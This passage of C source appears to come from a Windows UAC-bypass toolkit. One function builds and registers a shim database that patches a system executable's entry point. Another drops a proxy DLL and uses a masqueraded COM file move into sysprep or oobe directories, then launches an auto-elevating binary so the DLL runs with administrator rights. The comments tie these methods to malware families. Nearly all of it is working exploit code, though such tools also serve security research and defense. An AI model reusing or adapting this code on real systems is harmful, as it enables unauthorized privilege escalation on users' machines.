        if (CoCreateGuid(&exeGUID) != S_OK) {
            break;
        }

        RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
        if (!GetTempPathW(MAX_PATH, szTempDirectory)) {
            break;
        }

        // drop Fubuki
        // szShimDbPath is used as a scratch buffer for the DLL path first
        RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
        wsprintfW(szShimDbPath, L"%wsr3.dll", szTempDirectory);
        if (!supWriteBufferToFile(szShimDbPath, ProxyDll, ProxyDllSize)) {
            break;
        }

        // now the real .sdb path
        RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
        wsprintfW(szShimDbPath, L"%wsamuzani.sdb", szTempDirectory);

        hpdb = SdbCreateDatabase(szShimDbPath, DOS_PATH);
        if (hpdb == NULL) {
            break;
        }

        // index EXE entries by NAME; started/stopped/committed once here, restarted before the EXE list below
        if (!SdbDeclareIndex(hpdb, TAG_EXE, TAG_NAME, 1, TRUE, &indexid)) {
            break;
        }
        if (!SdbStartIndexing(hpdb, indexid)) {
            break;
        }
        SdbStopIndexing(hpdb, indexid);
        SdbCommitIndexes(hpdb);

        // begin DATABASE {
        dbrf = SdbBeginWriteListTag(hpdb, TAG_DATABASE);

        if (!SdbWriteStringTag(hpdb, TAG_NAME, L"amuzani")) {
            break;
        }
        SdbWriteBinaryTag(hpdb, TAG_DATABASE_ID, (PBYTE)&dbGUID, sizeof(GUID));
        SdbWriteDWORDTag(hpdb, TAG_OS_PLATFORM, 0x1); //<- win32

        // begin LIBRARY {
        libref = SdbBeginWriteListTag(hpdb, TAG_LIBRARY);

        patchref = SdbBeginWriteListTag(hpdb, TAG_PATCH); // begin LIBRARY-PATCH
        SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME);

        // query EP RVA for target
        // szTempDirectory is reused as a scratch buffer for the target's full path
        RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
        wsprintfW(szTempDirectory, L"%ws\\%ws", szSystemDirectory, SHIMPATCH_EXENAME);
        epRVA = supQueryEntryPointRVA(szTempDirectory);
        if (epRVA == 0) {
            break;
        }

        // 32 KiB zeroed scratch block for the single PATCHBITS record
        tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 32 * 1024);
        if (tmp != NULL) {

            patchbits = (PPATCHBITS)tmp;
            sz = 0;

            patchbits->Opcode = PATCH_REPLACE;
            patchbits->RVA = epRVA;
            _strcpy_w(patchbits->ModuleName, SHIMPATCH_EXENAME);
            supCopyMemory((char *)&patchbits->Pattern, sizeof(patchcode32), patchcode32, sizeof(patchcode32));
            patchbits->PatternSize = sizeof(patchcode32);
            // record length = fixed header + trailing pattern bytes
            patchbits->ActionSize = sizeof(PATCHBITS) + patchbits->PatternSize;

            sz += patchbits->ActionSize;

            SdbWriteBinaryTag(hpdb, TAG_PATCH_BITS, tmp, sz);
            HeapFree(GetProcessHeap(), 0, tmp);
        }

        SdbEndWriteListTag(hpdb, patchref); // end LIBRARY-PATCH

        // end LIBRARY
        SdbEndWriteListTag(hpdb, libref);

        SdbStartIndexing(hpdb, indexid);

        // begin EXE {
        exeref = SdbBeginWriteListTag(hpdb, TAG_EXE);
        SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME);
        SdbWriteStringTag(hpdb, TAG_APP_NAME, SHIMPATCH_EXENAME);
        SdbWriteBinaryTag(hpdb, TAG_EXE_ID, (PBYTE)&exeGUID, sizeof(GUID));

        // begin MATCH {
        matchfileref = SdbBeginWriteListTag(hpdb, TAG_MATCHING_FILE);
        SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME);
        SdbWriteStringTag(hpdb, TAG_COMPANY_NAME, SHIMPATCH_MSFTFULL);
        SdbEndWriteListTag(hpdb, matchfileref); // } end MATCH

        // PATCH_REF links this EXE entry to the LIBRARY-PATCH written above by its TAGID
        patchfileref = SdbBeginWriteListTag(hpdb, TAG_PATCH_REF);
        SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME);
        SdbWriteDWORDTag(hpdb, TAG_PATCH_TAGID, patchref);
        SdbEndWriteListTag(hpdb, patchfileref);

        SdbEndWriteListTag(hpdb, exeref); // } end EXE

        // } end DATABASE
        SdbEndWriteListTag(hpdb, dbrf);

        SdbCloseDatabaseWrite(hpdb);

        // Register db and run target.
        bResult = ucmRegisterAndRunTarget(szSystemDirectory, szSdbinstPath, szShimDbPath, L"%ws\\iscsicli.exe", TRUE);

    } while (cond);

    return bResult;
}
/*
* ucmStandardAutoElevation
*
* Purpose:
*
* Leo Davidson AutoElevation method with derivatives.
*
* UacMethodSysprep1 - Original Leo Davidson concept.
* UacMethodSysprep2 - Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection).
* UacMethodTilon - Leo Davidson concept with different target dll, used by Win32/Tilon.
* UacMethodSysprep3 - Windows 10 TH1 adapted UacMethodSysprep1.
* UacMethodOobe - WinNT/Pitou derivative from Leo Davidson concept.
*
* Parameters:
*   Method                 - one of the UacMethod* values listed above; anything else returns FALSE
*                            before touching the disk.
*   ProxyDll, ProxyDllSize - bytes written to the chosen source-DLL path. Not NULL-checked here.
*
* Return: result of supRunProcess, or FALSE if the drop or the move failed.
*
* Later revision of the DWORD-typed ucmStandardAutoElevation elsewhere in this file: paths are now
* assembled from g_ctx.szTempDirectory / g_ctx.szSystemDirectory plus per-method name macros, and
* the copy into the protected directory is done by ucmMasqueradedMoveFileCOM instead of an
* explorer.exe injection.
*
* Artifacts: the dropped DLL in g_ctx.szTempDirectory, the same file name in the target directory,
* and a process started from szTargetProcess.
*
*/
BOOL ucmStandardAutoElevation(
    UACBYPASSMETHOD Method,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    // cond stays FALSE: single-pass do/while, `break` exits early
    BOOL cond = FALSE, bResult = FALSE;
    WCHAR szSourceDll[MAX_PATH * 2];
    WCHAR szTargetDir[MAX_PATH * 2];
    WCHAR szTargetProcess[MAX_PATH * 2];

    // common prefixes; the switch appends the method-specific tails
    _strcpy(szSourceDll, g_ctx.szTempDirectory);
    _strcpy(szTargetDir, g_ctx.szSystemDirectory);
    _strcpy(szTargetProcess, g_ctx.szSystemDirectory);

    switch (Method) {

    case UacMethodSysprep1:
        //%temp%\cryptbase.dll
        _strcat(szSourceDll, CRYPTBASE_DLL);
        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);
        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);
        break;

    case UacMethodSysprep2:
        //%temp\\shcore.dll
        _strcat(szSourceDll, SHCORE_DLL);
        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);
        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);
        break;

    case UacMethodSysprep3:
        //%temp%\dbgcore.dll
        _strcat(szSourceDll, DBGCORE_DLL);
        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);
        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);
        break;

    case UacMethodOobe:
        //%temp%\wdscore.dll
        _strcat(szSourceDll, WDSCORE_DLL);
        //%systemroot%\system32\oobe\"
        _strcat(szTargetDir, L"oobe\\");
        //%systemroot%\system32\oobe\setupsqm.exe
        // NOTE(review): unlike the sysprep cases no directory is appended before the EXE name here;
        // presumably SETUPSQM_EXE already carries the "oobe\" prefix, otherwise the process path
        // would not match the comment above — confirm against the macro definition
        _strcat(szTargetProcess, SETUPSQM_EXE);
        break;

    case UacMethodTilon:
        //%temp%\ActionQueue.dll
        _strcat(szSourceDll, ACTIONQUEUE_DLL);
        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);
        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);
        break;

    default:
        return FALSE;
    }

    do {

        // drop, move into the protected directory, run the target — each step gates the next
        if (!supWriteBufferToFile(szSourceDll, ProxyDll, ProxyDllSize))
            break;

        if (!ucmMasqueradedMoveFileCOM(szSourceDll, szTargetDir))
            break;

        bResult = supRunProcess(szTargetProcess, NULL);

    } while (cond);

    return bResult;
}